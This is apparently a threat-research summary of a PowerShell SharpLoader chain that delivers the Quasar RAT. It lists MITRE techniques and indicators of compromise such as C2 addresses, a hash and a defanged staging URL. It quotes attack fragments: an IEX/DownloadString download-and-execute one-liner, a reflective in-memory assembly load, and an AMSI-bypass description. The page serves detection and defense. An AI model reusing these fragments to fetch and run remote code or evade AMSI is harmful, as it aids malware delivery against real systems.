Threat Research

Quasar RAT Delivered Through Updated SharpLoader

Securonix

SharpLoader is a very old project that loads and decompresses a C# payload from a remote server or local file to execute it. The article details a PowerShell-based chain that bypasses AMSI, downloads stage payloads, decrypts and loads a Quasar RAT in memory, and provides context on the loader’s origins and technical specifics. Hashtags: #QuasarRAT #SharpLoader #AMSIBypass #PowerShell #Stager

Keypoints

  • SharpLoader is an old project that loads and decompresses a C# payload from a remote web server or a local file to execute it.
  • A Powershell-based version exists and uses AMSI bypass techniques to evade detection.
  • The loaders chain downloads a second PowerShell payload from a remote URL and executes it via IEX.
  • The final stage loads a DLL in memory (not on disk) and runs the Quasar RAT payload.

MITRE Techniques

  • [T1562.001] Impair Defenses – Hooked AMSI (AmsiScanBuffer) to always return S_OK, bypassing malware detection. Quote: ‘hook the function AmsiScanBuffer(). Basically, it will always return “S_OK” meaning that the code is not malicious.’
  • [T1059.001] PowerShell – Uses PowerShell to download and execute remote payloads (IEX and downloadstring). Quote: ‘IEX ((new-object net.webclient).downloadstring(‘$uri’))’ and ‘(New-Object Net.WebClient).DownloadString(‘…’) | IEX’
  • [T1105] Ingress Tool Transfer – Downloads subsequent stage payloads from a remote URL and executes them. Quote: ‘The script downloads and executes a second PowerShell payload:’
  • [T1055] Process Injection – In-memory loading and execution of a .NET DLL via Reflection. Quote: ‘[Reflection.Assembly]::Load([Convert]::FromBase64String(“TVqQAAMAAAAEA…”)) | Out-Null [SharpLoader.Program]::Main(…)’
  • [T1027] Obfuscated/Compressed Files and Information – Base64-encoded payload (starts with “TVqQAAM”) and in-memory decrypt/decode steps. Quote: ‘There is some “magic” to decrypt the payload. You can see a Base64-encoded payload starting with “TVqQAAM”.’

Indicators of Compromise

  • [IP Address] 193.161.193.99:58530 – C2 server referenced in the Quasar config.
  • [IP Address] 5.206.224.58 – Hosting/loading infrastructure used for stage payloads (URLs shown in the article).
  • [SHA256] caf572b1ea51e044b92d1e37c6ee9f8bf4dd178cf6c71cff5a3527c7870a397b – Quasar RAT final payload hash.
  • [File] SC_Loader_rat.ps1 – PowerShell stage file used in the loader chain.
  • [File] stager_SC_Loader_rat.ps1 – Stage 2 loader script.
  • [File] MODULS/SC_Loader_rat0.ps1 – Stage 2 module loader script.
  • [File] Client-built0.enc – Encrypted/encoded DLL payload loaded into memory.
  • [URL] hxxp://5[.]206[.]224[.]58/MGQ3YTFjZDVkMjI5OTEzMj/uploads/STAGERS/stager_SC_Loader_rat.ps1 – Original URL for the first stage payload download.

Read more: https://isc.sans.edu/diary/rss/30414

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint